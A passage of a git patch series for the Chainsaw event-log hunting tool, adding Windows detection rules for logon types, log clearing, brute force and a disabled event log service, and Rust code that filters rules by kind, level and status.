+fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: interactive and not local_ips_or_machine_accounts + + interactive: + Event.System.EventID: 4624 + Event.EventData.LogonType: 2 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw new file mode 100644 index 00000000..2a0c84ff --- /dev/null +++ b/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: Network Logon +group: Lateral Movement +description: An Network based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: network and not local_ips_or_machine_accounts + + network: + Event.System.EventID: 4624 + Event.EventData.LogonType: 3 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw new file mode 100644 index 00000000..6b30d410 --- /dev/null +++ b/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: RDP Logon +group: Lateral Movement +description: An RDP based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: rdp and not local_ips_or_machine_accounts + + rdp: + Event.System.EventID: 4624 + Event.EventData.LogonType: 10 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw new file mode 100644 index 00000000..3a445b98 --- /dev/null +++ b/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: Service Logon +group: Lateral Movement +description: An Service based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: service and not local_ips_or_machine_accounts + + service: + Event.System.EventID: 4624 + Event.EventData.LogonType: 5 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw new file mode 100644 index 00000000..74ab79a8 --- /dev/null +++ b/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw @@ -0,0 +1,40 @@ +--- +title: Unlock Logon +group: Lateral Movement +description: An Unlock based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: unlock and not local_ips_or_machine_accounts + + unlock: + Event.System.EventID: 4624 + Event.EventData.LogonType: 7 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw new file mode 100644 index 00000000..bd010f2f --- /dev/null +++ b/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw @@ -0,0 +1,32 @@ +--- +title: Security Audit Logs Cleared +group: Log Tampering +description: The security audit logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: security_log_cleared and not empty + + security_log_cleared: + Event.System.EventID: 1102 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw new file mode 100644 index 00000000..a3a6ad6c --- /dev/null +++ b/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw @@ -0,0 +1,32 @@ +--- +title: System Logs Cleared +group: Log Tampering +description: The system logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: system_log_cleared and not empty + + system_log_cleared: + Event.System.EventID: 104 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw b/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw new file mode 100644 index 00000000..9935fe9e --- /dev/null +++ b/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw @@ -0,0 +1,34 @@ +--- +title: Account Brute Force +group: Login Attacks +description: An account that appears to have been brute forced. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: User + to: Event.EventData.TargetUserName + + +filter: + condition: failed_logons and not empty + + failed_logons: + Event.System.EventID: 4625 + empty: + Event.EventData.TargetUserName: 'null' + + +aggregate: + count: '>5' + fields: + - Event.EventData.TargetUserName diff --git a/chainsaw_rules/service_tampering/event_log.yml.chainsaw b/chainsaw_rules/service_tampering/event_log.yml.chainsaw new file mode 100644 index 00000000..54c9414c --- /dev/null +++ b/chainsaw_rules/service_tampering/event_log.yml.chainsaw @@ -0,0 +1,31 @@ +--- +title: Windows Event Log Stopped +group: Service Tampering +description: The Windows Event Log service has been stopped. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Service Name + to: Event.EventData.param1 + - name: Action + to: Event.EventData.param2 + + +filter: + Event.System.EventID: 7040 + Event.EventData.param1: Windows Event Log + Event.EventData.param2: disabled From 2c93e0536a5892b088cf2943d0ab1ed61e791f0a Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Fri, 24 Jun 2022 00:53:05 +0100 Subject: [PATCH 41/77] renaming chainsaw rules --- .../{new_user_created.yml.chainsaw => new_user_created.yml} | 0 ..._global_group.yml.chainsaw => user_added_to_global_group.yml} | 0 ...to_local_group.yml.chainsaw => user_added_to_local_group.yml} | 0 ...rsal_group.yml.chainsaw => user_added_to_universal_group.yml} | 0 chainsaw_rules/antivirus/{f-secure.yml.chainsaw => f-secure.yml} | 0 .../antivirus/{kaspersky.yml.chainsaw => kaspersky.yml} | 0 chainsaw_rules/antivirus/{sophos.yml.chainsaw => sophos.yml} | 0 .../{windows_defender.yml.chainsaw => windows_defender.yml} | 0 .../{batch_logon.yml.chainsaw => batch_logon.yml} | 0 .../{interactive_logon.yml.chainsaw => interactive_logon.yml} | 0 .../{network_logon.yml.chainsaw => network_logon.yml} | 0 .../lateral_movement/{rdp_logon.yml.chainsaw => rdp_logon.yml} | 0 .../{service_logon.yml.chainsaw => service_logon.yml} | 0 .../{unlock_logon.yml.chainsaw => unlock_logon.yml} | 1 + ...s_cleared.yml.chainsaw => security_audit_log_was_cleared.yml} | 0 ...m_log_was_cleared.yml.chainsaw => system_log_was_cleared.yml} | 0 ...{account_brute_force.yml.chainsaw => account_brute_force.yml} | 0 .../service_tampering/{event_log.yml.chainsaw => event_log.yml} | 0 18 files changed, 1 insertion(+) rename chainsaw_rules/account_tampering/{new_user_created.yml.chainsaw => new_user_created.yml} (100%) rename chainsaw_rules/account_tampering/{user_added_to_global_group.yml.chainsaw => user_added_to_global_group.yml} (100%) rename chainsaw_rules/account_tampering/{user_added_to_local_group.yml.chainsaw => user_added_to_local_group.yml} (100%) rename chainsaw_rules/account_tampering/{user_added_to_universal_group.yml.chainsaw => user_added_to_universal_group.yml} (100%) rename chainsaw_rules/antivirus/{f-secure.yml.chainsaw => f-secure.yml} (100%) rename chainsaw_rules/antivirus/{kaspersky.yml.chainsaw => kaspersky.yml} (100%) rename chainsaw_rules/antivirus/{sophos.yml.chainsaw => sophos.yml} (100%) rename chainsaw_rules/antivirus/{windows_defender.yml.chainsaw => windows_defender.yml} (100%) rename chainsaw_rules/lateral_movement/{batch_logon.yml.chainsaw => batch_logon.yml} (100%) rename chainsaw_rules/lateral_movement/{interactive_logon.yml.chainsaw => interactive_logon.yml} (100%) rename chainsaw_rules/lateral_movement/{network_logon.yml.chainsaw => network_logon.yml} (100%) rename chainsaw_rules/lateral_movement/{rdp_logon.yml.chainsaw => rdp_logon.yml} (100%) rename chainsaw_rules/lateral_movement/{service_logon.yml.chainsaw => service_logon.yml} (100%) rename chainsaw_rules/lateral_movement/{unlock_logon.yml.chainsaw => unlock_logon.yml} (95%) rename chainsaw_rules/log_tampering/{security_audit_log_was_cleared.yml.chainsaw => security_audit_log_was_cleared.yml} (100%) rename chainsaw_rules/log_tampering/{system_log_was_cleared.yml.chainsaw => system_log_was_cleared.yml} (100%) rename chainsaw_rules/login_attacks/{account_brute_force.yml.chainsaw => account_brute_force.yml} (100%) rename chainsaw_rules/service_tampering/{event_log.yml.chainsaw => event_log.yml} (100%) diff --git a/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw b/chainsaw_rules/account_tampering/new_user_created.yml similarity index 100% rename from chainsaw_rules/account_tampering/new_user_created.yml.chainsaw rename to chainsaw_rules/account_tampering/new_user_created.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_global_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw rename to chainsaw_rules/account_tampering/user_added_to_global_group.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_local_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw rename to chainsaw_rules/account_tampering/user_added_to_local_group.yml diff --git a/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_universal_group.yml similarity index 100% rename from chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw rename to chainsaw_rules/account_tampering/user_added_to_universal_group.yml diff --git a/chainsaw_rules/antivirus/f-secure.yml.chainsaw b/chainsaw_rules/antivirus/f-secure.yml similarity index 100% rename from chainsaw_rules/antivirus/f-secure.yml.chainsaw rename to chainsaw_rules/antivirus/f-secure.yml diff --git a/chainsaw_rules/antivirus/kaspersky.yml.chainsaw b/chainsaw_rules/antivirus/kaspersky.yml similarity index 100% rename from chainsaw_rules/antivirus/kaspersky.yml.chainsaw rename to chainsaw_rules/antivirus/kaspersky.yml diff --git a/chainsaw_rules/antivirus/sophos.yml.chainsaw b/chainsaw_rules/antivirus/sophos.yml similarity index 100% rename from chainsaw_rules/antivirus/sophos.yml.chainsaw rename to chainsaw_rules/antivirus/sophos.yml diff --git a/chainsaw_rules/antivirus/windows_defender.yml.chainsaw b/chainsaw_rules/antivirus/windows_defender.yml similarity index 100% rename from chainsaw_rules/antivirus/windows_defender.yml.chainsaw rename to chainsaw_rules/antivirus/windows_defender.yml diff --git a/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/batch_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/batch_logon.yml diff --git a/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/interactive_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/interactive_logon.yml diff --git a/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/network_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/network_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/network_logon.yml diff --git a/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/rdp_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/rdp_logon.yml diff --git a/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/service_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/service_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/service_logon.yml diff --git a/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/unlock_logon.yml similarity index 95% rename from chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/unlock_logon.yml index 74ab79a8..f5f798b3 100644 --- a/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw +++ b/chainsaw_rules/lateral_movement/unlock_logon.yml @@ -9,6 +9,7 @@ authors: kind: evtx level: info status: stable +timestamp: Event.System.TimeCreated fields: diff --git a/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw rename to chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml diff --git a/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/system_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw rename to chainsaw_rules/log_tampering/system_log_was_cleared.yml diff --git a/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw b/chainsaw_rules/login_attacks/account_brute_force.yml similarity index 100% rename from chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw rename to chainsaw_rules/login_attacks/account_brute_force.yml diff --git a/chainsaw_rules/service_tampering/event_log.yml.chainsaw b/chainsaw_rules/service_tampering/event_log.yml similarity index 100% rename from chainsaw_rules/service_tampering/event_log.yml.chainsaw rename to chainsaw_rules/service_tampering/event_log.yml From b4f0497dfa32d85da829dfd0c3f87410acd194a0 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Sat, 25 Jun 2022 13:17:59 +0100 Subject: [PATCH 42/77] fix: incorrect merge fix --- src/ext/tau.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/ext/tau.rs b/src/ext/tau.rs index 362b0f70..7d5609f9 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -41,7 +41,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut not = false; let (field, key) = if key.starts_with("int(") && key.ends_with(')') { let key = key[4..key.len() - 1].to_owned(); - (Expression::Cast(key.to_owned(), MiscSym::Int), key) + (Expression::Cast(key.to_owned(), ModSym::Int), key) } else if key.starts_with("not(") && key.ends_with(')') { not = true; let key = key[4..key.len() - 1].to_owned(); From 3fefda88cdfe0608b4e56ccda3a088074bf2e773 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Sat, 25 Jun 2022 13:30:24 +0100 Subject: [PATCH 43/77] chore: bumping cargo to alpha 6 --- Cargo.toml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.toml b/Cargo.toml index 10dc50c7..ee1e2088 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,9 +1,9 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.5" +version = "2.0.0-alpha.6" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" -authors = ["James Dorgan ","Alex Kornitzer "] +authors = ["James Dorgan ","Alex Kornitzer "] readme = "README.md" license = "GPL3" edition = "2021" From 3e6d64a73b3e8ac42431473f02e8f55d6eee29c7 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 26 Jun 2022 18:22:03 +0100 Subject: [PATCH 44/77] feat: allow rules to be filtered by kind, level and status This is initial support, the structure and parsing needs a clean which I will do next, this refactor will also then let us handle additional fields better for outputting etc. --- Cargo.lock | 9 ++++++- src/lib.rs | 5 +++- src/main.rs | 60 ++++++++++++++++++++++++++++++++++++++------ src/rule/chainsaw.rs | 38 +++++++++++++++++++++++++--- src/rule/mod.rs | 48 +++++++++++++++++++++++++++++------ 5 files changed, 138 insertions(+), 22 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 3959d1de..a5754deb 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -117,6 +117,12 @@ version = "1.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "14c189c53d098945499cdfa7ecc63567cf3886b3332b312a5b4585d8d3a6a610" +[[package]] +name = "bytesize" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6c58ec36aac5066d5ca17df51b3e70279f5670a72102f5752cb7e7c856adfc70" + [[package]] name = "camino" version = "1.0.9" @@ -156,10 +162,11 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.5" +version = "2.0.0-alpha.6" dependencies = [ "aho-corasick 0.7.18", "anyhow", + "bytesize", "chrono", "chrono-tz", "colour", diff --git a/src/lib.rs b/src/lib.rs index cfc722e2..1aef655d 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -5,7 +5,10 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Hunter, HunterBuilder}; -pub use rule::{chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind}; +pub use rule::{ + chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind, Level as RuleLevel, + Status as RuleStatus, +}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index 1f6c96cc..11fba64b 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,7 +1,7 @@ #[macro_use] extern crate chainsaw; -extern crate bytesize; +use std::collections::HashSet; use std::fs::File; use std::path::PathBuf; @@ -13,8 +13,8 @@ use chrono_tz::Tz; use structopt::StructOpt; use chainsaw::{ - cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, Searcher, - Writer, + cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, RuleLevel, + RuleStatus, Searcher, Writer, }; #[derive(StructOpt)] @@ -65,6 +65,12 @@ enum Command { /// Print the output in json format. #[structopt(group = "format", long = "json")] json: bool, + /// Restrict loaded rules to specified kinds. + #[structopt(long = "kind", number_of_values = 1)] + kinds: Vec, + /// Restrict loaded rules to specified levels. + #[structopt(long = "level", number_of_values = 1)] + levels: Vec, /// Allow chainsaw to try and load files it cannot identify. #[structopt(long = "load-unknown")] load_unknown: bool, @@ -83,6 +89,9 @@ enum Command { /// Continue to hunt when an error is encountered. #[structopt(long = "skip-errors")] skip_errors: bool, + /// Restrict loaded rules to specified statuses. + #[structopt(long = "status", number_of_values = 1)] + statuses: Vec, /// Output the timestamp using the timezone provided. #[structopt(long = "timezone", group = "tz")] timezone: Option, @@ -227,11 +236,14 @@ fn run() -> Result<()> { from, full, json, + kinds, + levels, local, metadata, output, quiet, skip_errors, + statuses, timezone, to, } => { @@ -243,17 +255,49 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; - cs_eprintln!("[+] Loading event logs from: {:?}", path); - cs_eprintln!("[+] Loading detection rules from: {:?}", rules); + + cs_eprintln!( + "[+] Loading event logs from: {}", + path.iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", ") + ); + + cs_eprintln!( + "[+] Loading detection rules from: {}", + rules + .iter() + .map(|r| r.display().to_string()) + .collect::>() + .join(", ") + ); + let kinds: Option> = if kinds.is_empty() { + None + } else { + Some(HashSet::from_iter(kinds.into_iter())) + }; + let levels: Option> = if levels.is_empty() { + None + } else { + Some(HashSet::from_iter(levels.into_iter())) + }; + let statuses: Option> = if statuses.is_empty() { + None + } else { + Some(HashSet::from_iter(statuses.into_iter())) + }; let mut failed = 0; let mut count = 0; let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&file, &mapping.is_some()) { + match load_rule(&file, &mapping.is_some(), &kinds, &levels, &statuses) { Ok(mut r) => { - count += 1; - rs.append(&mut r) + if !r.is_empty() { + count += 1; + rs.append(&mut r) + } } Err(e) => { // Hacky way of exposing rule types from load_rule function diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index 29cd9244..7d52f70f 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -2,6 +2,7 @@ use std::fmt; use std::fs::File; use std::io::Read; use std::path::Path; +use std::str::FromStr; use serde::{ de::{self, MapAccess, Visitor}, @@ -133,7 +134,7 @@ pub enum Format { Json, } -#[derive(Clone, Debug, Deserialize, Serialize)] +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Level { Critical, @@ -155,22 +156,51 @@ impl fmt::Display for Level { } } -#[derive(Clone, Debug, Deserialize, Serialize)] +impl FromStr for Level { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "critical" => Self::Critical, + "high" => Self::High, + "medium" => Self::Medium, + "low" => Self::Low, + "info" => Self::Info, + _ => anyhow::bail!("unknown level, must be: critical, high, medium, low or info"), + }; + Ok(v) + } +} + +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Status { Stable, - Testing, + Experimental, } impl fmt::Display for Status { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { Self::Stable => write!(f, "stable"), - Self::Testing => write!(f, "testing"), + Self::Experimental => write!(f, "experimental"), } } } +impl FromStr for Status { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "stable" => Self::Stable, + "experimental" => Self::Experimental, + _ => anyhow::bail!("unknown status, must be: stable or experimental"), + }; + Ok(v) + } +} + #[derive(Clone, Debug, Deserialize)] pub struct Rule { #[serde(alias = "title")] diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 016dc959..e7d44ba5 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,3 +1,4 @@ +use std::collections::HashSet; use std::fmt; use std::path::Path; use std::str::FromStr; @@ -6,7 +7,7 @@ use serde::{Deserialize, Serialize}; use crate::file::Kind as FileKind; -pub use self::chainsaw::{Filter, Rule as Chainsaw}; +pub use self::chainsaw::{Filter, Level, Rule as Chainsaw, Status}; pub use self::sigma::Rule as Sigma; pub use self::stalker::Rule as Stalker; @@ -58,7 +59,13 @@ pub struct Rule { pub kind: Kind, } -pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { +pub fn load_rule( + path: &Path, + mapping: &bool, + kinds: &Option>, + levels: &Option>, + statuses: &Option>, +) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); @@ -66,7 +73,12 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { } // This is a bit crude but we try all formats then report the errors... - let rules = if let Ok(rule) = chainsaw::load(path) { + let mut rules = if let Ok(rule) = chainsaw::load(path) { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Chainsaw) { + return Ok(vec![]); + } + } vec![Rule { chainsaw: rule, kind: Kind::Chainsaw, @@ -76,6 +88,11 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { // Hacky way of exposing rule types from load_rule function anyhow::bail!("sigma-no-mapping"); } + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Sigma) { + return Ok(vec![]); + } + } let sigma = match rules .into_iter() .map(|y| serde_yaml::from_value::(y)) @@ -110,9 +127,9 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { .status .map(|s| match s.as_str() { "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Testing, + _ => chainsaw::Status::Experimental, }) - .unwrap_or_else(|| chainsaw::Status::Testing), + .unwrap_or_else(|| chainsaw::Status::Experimental), timestamp: "".to_owned(), fields: vec![], @@ -130,6 +147,11 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { }) .collect() } else if let Ok(rule) = stalker::load(path) { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Stalker) { + return Ok(vec![]); + } + } vec![Rule { chainsaw: Chainsaw { name: rule.tag, @@ -147,7 +169,7 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { }, status: match rule.status.as_str() { "stable" => chainsaw::Status::Stable, - _ => chainsaw::Status::Testing, + _ => chainsaw::Status::Experimental, }, timestamp: "".to_owned(), @@ -165,9 +187,19 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { anyhow::bail!("failed to load rule, run the linter for more information"); }; - if rules.is_empty() { - anyhow::bail!("No valid rules could be loaded from the file"); + if let Some(levels) = levels.as_ref() { + rules = rules + .into_iter() + .filter(|r| levels.contains(&r.chainsaw.level)) + .collect(); } + if let Some(statuses) = statuses.as_ref() { + rules = rules + .into_iter() + .filter(|r| statuses.contains(&r.chainsaw.status)) + .collect(); + } + Ok(rules) } From d7f922d263ec29db8bbbab42f2c8dd907df67d05 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 26 Jun 2022 18:31:59 +0100 Subject: [PATCH 45/77] tweak: align some help naming --- src/main.rs | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/src/main.rs b/src/main.rs index 11fba64b..84e0decd 100644 --- a/src/main.rs +++ b/src/main.rs @@ -67,10 +67,10 @@ enum Command { json: bool, /// Restrict loaded rules to specified kinds. #[structopt(long = "kind", number_of_values = 1)] - kinds: Vec, + kind: Vec, /// Restrict loaded rules to specified levels. #[structopt(long = "level", number_of_values = 1)] - levels: Vec, + level: Vec, /// Allow chainsaw to try and load files it cannot identify. #[structopt(long = "load-unknown")] load_unknown: bool, @@ -91,7 +91,7 @@ enum Command { skip_errors: bool, /// Restrict loaded rules to specified statuses. #[structopt(long = "status", number_of_values = 1)] - statuses: Vec, + status: Vec, /// Output the timestamp using the timezone provided. #[structopt(long = "timezone", group = "tz")] timezone: Option, @@ -236,14 +236,14 @@ fn run() -> Result<()> { from, full, json, - kinds, - levels, + kind, + level, local, metadata, output, quiet, skip_errors, - statuses, + status, timezone, to, } => { @@ -272,20 +272,20 @@ fn run() -> Result<()> { .collect::>() .join(", ") ); - let kinds: Option> = if kinds.is_empty() { + let kinds: Option> = if kind.is_empty() { None } else { - Some(HashSet::from_iter(kinds.into_iter())) + Some(HashSet::from_iter(kind.into_iter())) }; - let levels: Option> = if levels.is_empty() { + let levels: Option> = if level.is_empty() { None } else { - Some(HashSet::from_iter(levels.into_iter())) + Some(HashSet::from_iter(level.into_iter())) }; - let statuses: Option> = if statuses.is_empty() { + let statuses: Option> = if status.is_empty() { None } else { - Some(HashSet::from_iter(statuses.into_iter())) + Some(HashSet::from_iter(status.into_iter())) }; let mut failed = 0; let mut count = 0; From e38a6a46e95a1807c883e62ff1ce0bf78751541c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 3 Jul 2022 14:34:50 +0100 Subject: [PATCH 46/77] tweak: change how we handle rules internally --- src/cli.rs | 98 +++++++------ src/hunt.rs | 147 +++++++++---------- src/lib.rs | 3 +- src/main.rs | 38 +++-- src/rule/chainsaw.rs | 92 +----------- src/rule/mod.rs | 328 +++++++++++++++++++++++++------------------ src/rule/sigma.rs | 24 +++- src/rule/stalker.rs | 25 ---- 8 files changed, 369 insertions(+), 386 deletions(-) delete mode 100644 src/rule/stalker.rs diff --git a/src/cli.rs b/src/cli.rs index d58b4825..1974e42b 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,4 +1,4 @@ -use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; +use std::collections::{hash_map::DefaultHasher, BTreeMap, HashMap, HashSet}; use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; @@ -12,10 +12,7 @@ use 